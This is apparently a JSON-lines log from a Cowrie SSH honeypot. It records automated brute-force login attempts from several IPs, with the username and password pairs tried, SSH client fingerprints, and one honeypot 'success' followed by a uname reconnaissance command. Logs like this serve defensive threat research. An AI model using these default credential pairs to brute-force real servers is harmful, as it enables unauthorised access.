{"eventid":"cowrie.login.failed","username":"hadoop","password":"qwerty123456","message":"login attempt [hadoop/qwerty123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:23:42.363558Z","src_ip":"196.251.86.249","session":"2a3dd11c214b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:23:43.330744Z","src_ip":"212.227.125.160","session":"ad2cefb46e9c"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:23:44.230008Z","src_ip":"196.251.86.249","session":"2a3dd11c214b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37790,"dst_ip":"1.2.3.4","dst_port":22,"session":"671645b69426","protocol":"ssh","message":"New connection: 212.227.125.160:37790 (1.2.3.4:22) [session: 671645b69426]","sensor":"my-vps","timestamp":"2025-08-26T11:23:47.813011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:23:47.813660Z","src_ip":"212.227.125.160","session":"671645b69426"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:23:47.863342Z","src_ip":"212.227.125.160","session":"671645b69426"}
{"eventid":"cowrie.login.failed","username":"lvuser","password":"lvuser","message":"login attempt [lvuser/lvuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:23:48.027737Z","src_ip":"212.227.125.160","session":"671645b69426"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:23:49.095522Z","src_ip":"212.227.125.160","session":"671645b69426"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":52710,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a1886e9fafa","protocol":"ssh","message":"New connection: 83.168.105.65:52710 (1.2.3.4:22) [session: 6a1886e9fafa]","sensor":"my-vps","timestamp":"2025-08-26T11:23:49.589359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:23:49.590209Z","src_ip":"83.168.105.65","session":"6a1886e9fafa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:23:49.634691Z","src_ip":"83.168.105.65","session":"6a1886e9fafa"}
{"eventid":"cowrie.login.success","username":"root","password":"aA123456","message":"login attempt [root/aA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:23:49.746956Z","src_ip":"83.168.105.65","session":"6a1886e9fafa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:23:49.840872Z","src_ip":"83.168.105.65","session":"6a1886e9fafa"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:23:49.841646Z","src_ip":"83.168.105.65","session":"6a1886e9fafa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:23:49.880233Z","src_ip":"83.168.105.65","session":"6a1886e9fafa"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:23:49.881428Z","src_ip":"83.168.105.65","session":"6a1886e9fafa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38564,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3b95f170bbd","protocol":"ssh","message":"New connection: 212.227.125.160:38564 (1.2.3.4:22) [session: b3b95f170bbd]","sensor":"my-vps","timestamp":"2025-08-26T11:23:53.736206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:23:53.794357Z","src_ip":"212.227.125.160","session":"b3b95f170bbd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:23:53.795325Z","src_ip":"212.227.125.160","session":"b3b95f170bbd"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos","message":"login attempt [centos/centos] failed","sensor":"my-vps","timestamp":"2025-08-26T11:23:54.043637Z","src_ip":"212.227.125.160","session":"b3b95f170bbd"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:23:55.097248Z","src_ip":"212.227.125.160","session":"b3b95f170bbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39416,"dst_ip":"1.2.3.4","dst_port":22,"session":"707e2ae92a9c","protocol":"ssh","message":"New connection: 212.227.125.160:39416 (1.2.3.4:22) [session: 707e2ae92a9c]","sensor":"my-vps","timestamp":"2025-08-26T11:23:59.214116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:23:59.354508Z","src_ip":"212.227.125.160","session":"707e2ae92a9c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:23:59.355516Z","src_ip":"212.227.125.160","session":"707e2ae92a9c"}
{"eventid":"cowrie.login.failed","username":"gitlab-prometheus","password":"gitlab-prometheus","message":"login attempt [gitlab-prometheus/gitlab-prometheus] failed","sensor":"my-vps","timestamp":"2025-08-26T11:23:59.785954Z","src_ip":"212.227.125.160","session":"707e2ae92a9c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:00.845370Z","src_ip":"212.227.125.160","session":"707e2ae92a9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40100,"dst_ip":"1.2.3.4","dst_port":22,"session":"fede7280f50d","protocol":"ssh","message":"New connection: 212.227.125.160:40100 (1.2.3.4:22) [session: fede7280f50d]","sensor":"my-vps","timestamp":"2025-08-26T11:24:05.128163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:24:05.129190Z","src_ip":"212.227.125.160","session":"fede7280f50d"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":57778,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc96bd4c3bd3","protocol":"ssh","message":"New connection: 83.168.105.65:57778 (1.2.3.4:22) [session: fc96bd4c3bd3]","sensor":"my-vps","timestamp":"2025-08-26T11:24:05.239053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:24:05.239694Z","src_ip":"83.168.105.65","session":"fc96bd4c3bd3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:24:05.243227Z","src_ip":"212.227.125.160","session":"fede7280f50d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:24:05.275942Z","src_ip":"83.168.105.65","session":"fc96bd4c3bd3"}
{"eventid":"cowrie.login.failed","username":"esroot","password":"esroot","message":"login attempt [esroot/esroot] failed","sensor":"my-vps","timestamp":"2025-08-26T11:24:05.386194Z","src_ip":"83.168.105.65","session":"fc96bd4c3bd3"}
{"eventid":"cowrie.login.failed","username":"ciuser","password":"ciuser","message":"login attempt [ciuser/ciuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:24:05.637668Z","src_ip":"212.227.125.160","session":"fede7280f50d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:06.425319Z","src_ip":"83.168.105.65","session":"fc96bd4c3bd3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:06.704382Z","src_ip":"212.227.125.160","session":"fede7280f50d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40866,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb5698914745","protocol":"ssh","message":"New connection: 212.227.125.160:40866 (1.2.3.4:22) [session: fb5698914745]","sensor":"my-vps","timestamp":"2025-08-26T11:24:11.223556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:24:11.224765Z","src_ip":"212.227.125.160","session":"fb5698914745"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:24:11.287103Z","src_ip":"212.227.125.160","session":"fb5698914745"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar","message":"login attempt [sonar/sonar] failed","sensor":"my-vps","timestamp":"2025-08-26T11:24:12.355612Z","src_ip":"212.227.125.160","session":"fb5698914745"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:13.414982Z","src_ip":"212.227.125.160","session":"fb5698914745"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41636,"dst_ip":"1.2.3.4","dst_port":22,"session":"6225bfebabcd","protocol":"ssh","message":"New connection: 212.227.125.160:41636 (1.2.3.4:22) [session: 6225bfebabcd]","sensor":"my-vps","timestamp":"2025-08-26T11:24:17.075315Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:24:17.077170Z","src_ip":"212.227.125.160","session":"6225bfebabcd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:24:17.131752Z","src_ip":"212.227.125.160","session":"6225bfebabcd"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:24:17.334465Z","src_ip":"212.227.125.160","session":"6225bfebabcd"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:18.511751Z","src_ip":"212.227.125.160","session":"6225bfebabcd"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41134,"dst_ip":"1.2.3.4","dst_port":22,"session":"dda91cbed0e3","protocol":"ssh","message":"New connection: 83.168.105.65:41134 (1.2.3.4:22) [session: dda91cbed0e3]","sensor":"my-vps","timestamp":"2025-08-26T11:24:20.847439Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:24:20.848354Z","src_ip":"83.168.105.65","session":"dda91cbed0e3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:24:20.889066Z","src_ip":"83.168.105.65","session":"dda91cbed0e3"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab","message":"login attempt [gitlab/gitlab] failed","sensor":"my-vps","timestamp":"2025-08-26T11:24:21.008183Z","src_ip":"83.168.105.65","session":"dda91cbed0e3"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:22.050560Z","src_ip":"83.168.105.65","session":"dda91cbed0e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42402,"dst_ip":"1.2.3.4","dst_port":22,"session":"951cb4f3cb32","protocol":"ssh","message":"New connection: 212.227.125.160:42402 (1.2.3.4:22) [session: 951cb4f3cb32]","sensor":"my-vps","timestamp":"2025-08-26T11:24:23.156199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:24:23.157107Z","src_ip":"212.227.125.160","session":"951cb4f3cb32"}
